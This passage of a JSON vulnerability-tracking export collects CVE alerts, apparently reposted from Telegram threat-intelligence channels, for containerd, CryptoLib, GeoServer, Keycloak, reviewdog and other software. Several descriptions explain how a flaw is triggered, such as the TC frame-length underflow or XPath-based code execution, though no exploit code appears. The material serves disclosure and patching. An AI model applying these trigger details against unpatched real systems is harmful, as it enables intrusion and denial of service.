CVE-2024-40635\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: containerd is an open-source container runtime. A bug was found in containerd prior to versions 1.6.38, 1.7.27, and 2.0.4 where containers launched with a User set as a `UID:GID` larger than the maximum 32-bit signed integer can cause an overflow condition where the container ultimately runs as root (UID 0). This could cause unexpected behavior for environments that require containers to run as a non-root user. This bug has been fixed in containerd 1.6.38, 1.7.27, and 2.04. As a workaround, ensure that only trusted images are used and that only trusted users have permissions to import images.\n\ud83d\udccf Published: 2025-03-17T21:32:37.894Z\n\ud83d\udccf Modified: 2025-03-17T21:32:37.894Z\n\ud83d\udd17 References:\n1. https://github.com/containerd/containerd/security/advisories/GHSA-265r-hfxg-fhmg\n2. https://github.com/containerd/containerd/commit/05044ec0a9a75232cad458027ca83437aae3f4da\n3. https://github.com/containerd/containerd/commit/1a43cb6a1035441f9aca8f5666a9b3ef9e70ab20\n4. https://github.com/containerd/containerd/commit/cf158e884cfe4812a6c371b59e4ea9bc4c46e51a", "creation_timestamp": "2025-03-17T21:47:32.000000Z"}, {"uuid": "43438ca0-a9ce-438c-ade6-ef65b3dba39e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F5X-R59X-P8CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7891", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29912\n\ud83d\udd25 CVSS Score: 8.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. In versions 1.3.3 and prior, an unsigned integer underflow in the `Crypto_TC_ProcessSecurity` function of CryptoLib leads to a heap buffer overflow. The vulnerability is triggered when the `fl` (frame length) field in a Telecommand (TC) packet is set to 0. This underflow causes the frame length to be interpreted as 65535, resulting in out-of-bounds memory access. This critical vulnerability can be exploited to cause a denial of service (DoS) or potentially achieve remote code execution. Users of CryptoLib are advised to apply the recommended patch or avoid processing untrusted TC packets until a fix is available.\n\ud83d\udccf Published: 2025-03-17T22:48:40.833Z\n\ud83d\udccf Modified: 2025-03-17T22:48:40.833Z\n\ud83d\udd17 References:\n1. https://github.com/nasa/CryptoLib/security/advisories/GHSA-3f5x-r59x-p8cf\n2. https://github.com/nasa/CryptoLib/commit/ca39cb96f21e76102aefb956d2c8c0ba0bd143ca", "creation_timestamp": "2025-03-17T23:48:04.000000Z"}, {"uuid": "48ae9379-c611-4956-a8b9-54d878c4fa43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q4V2-FVRV-QRF6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7890", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29913\n\ud83d\udd25 CVSS Score: 8.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. A critical heap buffer overflow vulnerability was identified in the `Crypto_TC_Prep_AAD` function of CryptoLib versions 1.3.3 and prior. This vulnerability allows an attacker to trigger a Denial of Service (DoS) or potentially execute arbitrary code (RCE) by providing a maliciously crafted telecommand (TC) frame that causes an unsigned integer underflow. The vulnerability lies in the function `Crypto_TC_Prep_AAD`, specifically during the computation of `tc_mac_start_index`. The affected code incorrectly calculates the MAC start index without ensuring it remains within the bounds of the `ingest` buffer. When `tc_mac_start_index` underflows due to an incorrect length calculation, the function attempts to access an out-of-bounds memory location, leading to a segmentation fault. The vulnerability is still present in the repository as of commit `d3cc420ace96d02a5b7e83d88cbd2e48010d5723`.\n\ud83d\udccf Published: 2025-03-17T22:50:49.074Z\n\ud83d\udccf Modified: 2025-03-17T22:50:49.074Z\n\ud83d\udd17 References:\n1. https://github.com/nasa/CryptoLib/security/advisories/GHSA-q4v2-fvrv-qrf6", "creation_timestamp": "2025-03-17T23:48:03.000000Z"}, {"uuid": "b016858f-d095-4a09-bd86-dd61ec2ad521", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0334", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7898", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11029\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in the FreeIPA API audit, where it sends the whole FreeIPA command line to journalctl. As a consequence, during the FreeIPA installation process, it inadvertently leaks the administrative user credentials, including the administrator password, to the journal database. In the worst-case scenario, where the journal log is centralized, users with access to it can have improper access to the FreeIPA administrator credentials.\n\ud83d\udccf Published: 2025-01-15T12:55:30.964Z\n\ud83d\udccf Modified: 2025-03-18T09:19:42.287Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0334\n2. https://access.redhat.com/security/cve/CVE-2024-11029\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2325557", "creation_timestamp": "2025-03-18T09:50:41.000000Z"}, {"uuid": "eb9c8ef0-8757-4959-92d6-0a976e2a9b03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FH4V-V779-4G2W", "type": "seen", "source": "https://t.me/securixy_kz/1104", "content": "", "creation_timestamp": "2026-07-13T00:00:33.713811Z"}, {"uuid": "ef6f226e-83eb-4766-959d-b875f6f74d98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4PG-VG54-WXX4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7675", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12401\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the cert-manager package. This flaw allows an attacker who can modify PEM data that the cert-manager reads, for example, in a Secret resource, to use large amounts of CPU in the cert-manager controller pod to effectively create a denial-of-service (DoS) vector for the cert-manager in the cluster.\n\ud83d\udccf Published: 2024-12-12T09:06:03.612Z\n\ud83d\udccf Modified: 2025-03-15T05:58:20.676Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-12401\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2327929\n3. https://github.com/cert-manager/cert-manager/pull/7400\n4. https://github.com/cert-manager/cert-manager/pull/7401\n5. https://github.com/cert-manager/cert-manager/pull/7402\n6. https://github.com/cert-manager/cert-manager/pull/7403\n7. https://github.com/cert-manager/cert-manager/security/advisories/GHSA-r4pg-vg54-wxx4\n8. https://go.dev/issue/50116", "creation_timestamp": "2025-03-15T06:46:43.000000Z"}, {"uuid": "3b89f6bc-85da-4527-9009-f30a0942408a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3WJ-7VJ5-XJ5V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7767", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27102\n\ud83d\udd25 CVSS Score: 5.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P)\n\ud83d\udd39 Description: Agate is central authentication server software for OBiBa epidemiology applications. Prior to version 3.3.0, when registering for an Agate account, arbitrary HTML code can be injected into a user's first and last name. This HTML is then rendered in the email sent to administrative users. The Agate service account sends this email and appears trustworthy, making this a significant risk for phishing attacks. Administrative users are impacted, as they can be targeted by unauthenticated users. Version 3.3.0 fixes the issue.\n\ud83d\udccf Published: 2025-03-17T13:11:53.696Z\n\ud83d\udccf Modified: 2025-03-17T13:31:23.176Z\n\ud83d\udd17 References:\n1. https://github.com/obiba/agate/security/advisories/GHSA-v3wj-7vj5-xj5v\n2. https://github.com/obiba/agate/releases/tag/3.3.0", "creation_timestamp": "2025-03-17T13:46:59.000000Z"}, {"uuid": "56a0ecd3-1448-486c-ac8f-aedf89a85825", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFQ2-52F7-7QVJ", "type": "seen", "source": "Telegram/S2KXutw1drBgRs_xEuEIjByNvXPd-WruEjV0wL9OdN7BsNk", "content": "", "creation_timestamp": "2026-01-10T03:02:28.000000Z"}, {"uuid": "8e682495-75a8-438a-9ed7-cd3dfe8155e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93MQ-9FFX-83M2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7769", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29786\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Expr is an expression language and expression evaluation for Go. Prior to version 1.17.0, if the Expr expression parser is given an unbounded input string, it will attempt to compile the entire string and generate an Abstract Syntax Tree (AST) node for each part of the expression. In scenarios where input size isn\u2019t limited, a malicious or inadvertent extremely large expression can consume excessive memory as the parser builds a huge AST. This can ultimately lead to*excessive memory usage and an Out-Of-Memory (OOM) crash of the process. This issue is relatively uncommon and will only manifest when there are no restrictions on the input size, i.e. the expression length is allowed to grow arbitrarily large. In typical use cases where inputs are bounded or validated, this problem would not occur. The problem has been patched in the latest versions of the Expr library. The fix introduces compile-time limits on the number of AST nodes and memory usage during parsing, preventing any single expression from exhausting resources. Users should upgrade to Expr version 1.17.0 or later, as this release includes the new node budget and memory limit safeguards. Upgrading to v1.17.0 ensures that extremely deep or large expressions are detected and safely aborted during compilation, avoiding the OOM condition. For users who cannot immediately upgrade, the recommended workaround is to impose an input size restriction before parsing. In practice, this means validating or limiting the length of expression strings that your application will accept. For example, set a maximum allowable number of characters (or nodes) for any expression and reject or truncate inputs that exceed this limit. By ensuring no unbounded-length expression is ever fed into the parser, one can prevent the parser from constructing a pathologically large AST and avoid potential memory exhaustion. In short, pre-validate and cap input size as a safeguard in the absence of the patch.\n\ud83d\udccf Published: 2025-03-17T13:15:32.836Z\n\ud83d\udccf Modified: 2025-03-17T13:29:29.177Z\n\ud83d\udd17 References:\n1. https://github.com/expr-lang/expr/security/advisories/GHSA-93mq-9ffx-83m2\n2. https://github.com/expr-lang/expr/pull/762", "creation_timestamp": "2025-03-17T13:47:00.000000Z"}, {"uuid": "1a61ff76-58d6-4ba1-b480-7d5371e5edf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94VH-GPHV-8PM8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7771", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29787\n\ud83d\udd25 CVSS Score: 7.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: `zip` is a zip library for rust which supports reading and writing of simple ZIP files. In the archive extraction routine of affected versions of the `zip` crate starting with version 1.3.0 and prior to version 2.3.0, symbolic links earlier in the archive are allowed to be used for later files in the archive without validation of the final canonicalized path, allowing maliciously crafted archives to overwrite arbitrary files in the file system when extracted. Users who extract untrusted archive files using the following high-level API method may be affected and critical files on the system may be overwritten with arbitrary file permissions, which can potentially lead to code execution. Version 2.3.0 fixes the issue.\n\ud83d\udccf Published: 2025-03-17T13:19:23.925Z\n\ud83d\udccf Modified: 2025-03-17T13:19:23.925Z\n\ud83d\udd17 References:\n1. https://github.com/zip-rs/zip2/security/advisories/GHSA-94vh-gphv-8pm8\n2. https://github.com/zip-rs/zip2/commit/a2e062f37066c3b12860a32eb1cb44856cfb7afe\n3. https://gist.github.com/eternal-flame-AD/bf71ef4f6828e741eb12ce7fd47b7b85\n4. https://github.com/zip-rs/zip2/releases/tag/v2.3.0", "creation_timestamp": "2025-03-17T13:47:05.000000Z"}, {"uuid": "db78d78c-f615-4701-a744-f949bb5e60ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-527X-5WRF-22M2", "type": "seen", "source": "Telegram/KVWOQnBiY3Eem9HhxjtYUT7TdVna0GpQEMRBO0Jx4tvF1fc", "content": "", "creation_timestamp": "2026-01-08T17:15:40.000000Z"}, {"uuid": "6c724118-004c-48d3-a8a2-9c65f777336f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W532-JXJH-HJHJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7953", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29907\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: jsPDF is a library to generate PDFs in JavaScript. Prior to 3.0.1, user control of the first argument of the addImage method results in CPU utilization and denial of service. If given the possibility to pass unsanitised image urls to the addImage method, a user can provide a harmful data-url that results in high CPU utilization and denial of service. Other affected methods are html and addSvgAsImage. The vulnerability was fixed in jsPDF 3.0.1.\n\ud83d\udccf Published: 2025-03-18T18:40:57.504Z\n\ud83d\udccf Modified: 2025-03-18T18:40:57.504Z\n\ud83d\udd17 References:\n1. https://github.com/parallax/jsPDF/security/advisories/GHSA-w532-jxjh-hjhj\n2. https://github.com/parallax/jsPDF/commit/b167c43c27c466eb914b927885b06073708338df", "creation_timestamp": "2025-03-18T19:02:41.000000Z"}, {"uuid": "88c490cc-cee6-4d0d-90e0-ef977f90c856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQQR-FGMH-F626", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7959", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29790\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Contao is an Open Source CMS. Users can upload SVG files with malicious code, which is then executed in the back end and/or front end. This vulnerability is fixed in Contao 4.13.54, 5.3.30, or 5.5.6.\n\ud83d\udccf Published: 2025-03-18T18:36:34.279Z\n\ud83d\udccf Modified: 2025-03-18T18:36:34.279Z\n\ud83d\udd17 References:\n1. https://github.com/contao/contao/security/advisories/GHSA-vqqr-fgmh-f626\n2. https://contao.org/en/security-advisories/cross-site-scripting-through-svg-uploads", "creation_timestamp": "2025-03-18T19:02:53.000000Z"}, {"uuid": "2e575005-c304-468f-93a4-dc32dda1bc34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QMG3-HPQR-GQVC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30154\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: reviewdog/action-setup is a GitHub action that installs reviewdog. reviewdog/action-setup@v1 was compromised March 11, 2025, between 18:42 and 20:31 UTC, with malicious code added that dumps exposed secrets to Github Actions Workflow Logs. Other reviewdog actions that use `reviewdog/action-setup@v1` that would also be compromised, regardless of version or pinning method, are reviewdog/action-shellcheck, reviewdog/action-composite-template, reviewdog/action-staticcheck, reviewdog/action-ast-grep, and reviewdog/action-typos.\n\ud83d\udccf Published: 2025-03-19T15:15:29.113Z\n\ud83d\udccf Modified: 2025-03-19T16:21:02.390Z\n\ud83d\udd17 References:\n1. https://github.com/reviewdog/reviewdog/security/advisories/GHSA-qmg3-hpqr-gqvc\n2. https://github.com/reviewdog/reviewdog/issues/2079\n3. https://github.com/reviewdog/action-setup/commit/3f401fe1d58fe77e10d665ab713057375e39b887\n4. https://github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ec\n5. https://www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setup", "creation_timestamp": "2025-03-19T17:21:01.000000Z"}, {"uuid": "1abf7e55-a21f-48b6-b23b-ee553dd900fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFH6-3PQW-X2J4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8033", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2240\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Smallrye, where smallrye-fault-tolerance is vulnerable to an out-of-memory (OOM) issue. This vulnerability is externally triggered when calling the metrics URI. Every call creates a new object within meterMap and may lead to a denial of service (DoS) issue.\n\ud83d\udccf Published: 2025-03-12T14:55:15.889Z\n\ud83d\udccf Modified: 2025-03-19T06:49:29.761Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2025-2240\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2351452\n3. https://github.com/advisories/GHSA-gfh6-3pqw-x2j4", "creation_timestamp": "2025-03-19T07:49:36.000000Z"}, {"uuid": "cbda7cce-65cd-4cbd-b95e-d285e83fd507", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0299", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8065", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11736\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Keycloak. Admin users may have to access sensitive server environment variables and system properties through user-configurable URLs. When configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.\n\ud83d\udccf Published: 2025-01-14T08:36:08.583Z\n\ud83d\udccf Modified: 2025-03-19T14:52:27.254Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11736\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328850", "creation_timestamp": "2025-03-19T15:17:50.000000Z"}, {"uuid": "306379fd-0711-44f4-8c2e-3546dd9481a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0300", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8065", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11736\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Keycloak. Admin users may have to access sensitive server environment variables and system properties through user-configurable URLs. When configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.\n\ud83d\udccf Published: 2025-01-14T08:36:08.583Z\n\ud83d\udccf Modified: 2025-03-19T14:52:27.254Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11736\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328850", "creation_timestamp": "2025-03-19T15:17:50.000000Z"}, {"uuid": "3d749a0b-26b1-4374-9175-979e5534dae7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3PJ-WH35-FQ8W", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8062", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36401\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n\nThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.\n\nVersions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.\n\ud83d\udccf Published: 2024-07-01T15:25:41.873Z\n\ud83d\udccf Modified: 2025-03-19T14:55:46.536Z\n\ud83d\udd17 References:\n1. https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv\n2. https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w\n3. https://github.com/geotools/geotools/pull/4797\n4. https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852\n5. https://osgeo-org.atlassian.net/browse/GEOT-7587", "creation_timestamp": "2025-03-19T15:17:44.000000Z"}, {"uuid": "6939fd46-2b72-4c80-868c-c86b1d305d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ32-758C-3WM3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8144", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29924\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform. Prior to 15.10.14, 16.4.6, and 16.10.0-rc-1, it's possible for an user to get access to private information through the REST API - but could also be through another API - when a sub wiki is using \"Prevent unregistered users to view pages\". The vulnerability only affects subwikis, and it only concerns specific right options such as \"Prevent unregistered users to view pages\". or \"Prevent unregistered users to edit pages\". It's possible to detect the vulnerability by enabling \"Prevent unregistered users to view pages\" and then trying to access a page through the REST API without using any credentials. The vulnerability has been patched in XWiki 15.10.14, 16.4.6 and 16.10.0RC1.\n\ud83d\udccf Published: 2025-03-19T17:31:09.666Z\n\ud83d\udccf Modified: 2025-03-19T19:42:06.757Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-gq32-758c-3wm3\n2. https://github.com/xwiki/xwiki-platform/commit/5f98bde87288326cf5787604e2bb87836875ed0e\n3. https://jira.xwiki.org/browse/XWIKI-22640", "creation_timestamp": "2025-03-19T20:18:15.000000Z"}, {"uuid": "77415973-4e8d-4ac4-8413-21a252aa7866", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6009", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8167", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-03-20T02:44:49.516Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-03-20T03:29:19.000000Z"}, {"uuid": "f8d625a2-ebc2-4e33-946d-1401679aee58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-92CP-5422-2MW7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8247", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29923\n\ud83d\udd25 CVSS Score: 3.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: go-redis is the official Redis client library for the Go programming language. Prior to 9.5.5, 9.6.3, and 9.7.3, go-redis potentially responds out of order when `CLIENT SETINFO` times out during connection establishment. This can happen when the client is configured to transmit its identity, there are network connectivity issues, or the client was configured with aggressive timeouts. The problem occurs for multiple use cases. For sticky connections, you receive persistent out-of-order responses for the lifetime of the connection. All commands in the pipeline receive incorrect responses. When used with the default ConnPool once a connection is returned after use with ConnPool#Put the read buffer will be checked and the connection will be marked as bad due to the unread data. This means that at most one out-of-order response before the connection is discarded. This issue is fixed in 9.5.5, 9.6.3, and 9.7.3. You can prevent the vulnerability by setting the flag DisableIndentity to true when constructing the client instance.\n\ud83d\udccf Published: 2025-03-20T18:03:14.933Z\n\ud83d\udccf Modified: 2025-03-20T18:03:14.933Z\n\ud83d\udd17 References:\n1. https://github.com/redis/go-redis/security/advisories/GHSA-92cp-5422-2mw7\n2. https://github.com/redis/go-redis/pull/3295\n3. https://github.com/redis/go-redis/commit/d236865b0cfa1b752ea4b7da666b1fdcd0acebb6", "creation_timestamp": "2025-03-20T18:20:44.000000Z"}, {"uuid": "2500a777-2e20-47ac-b9bd-6b03be1e19f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 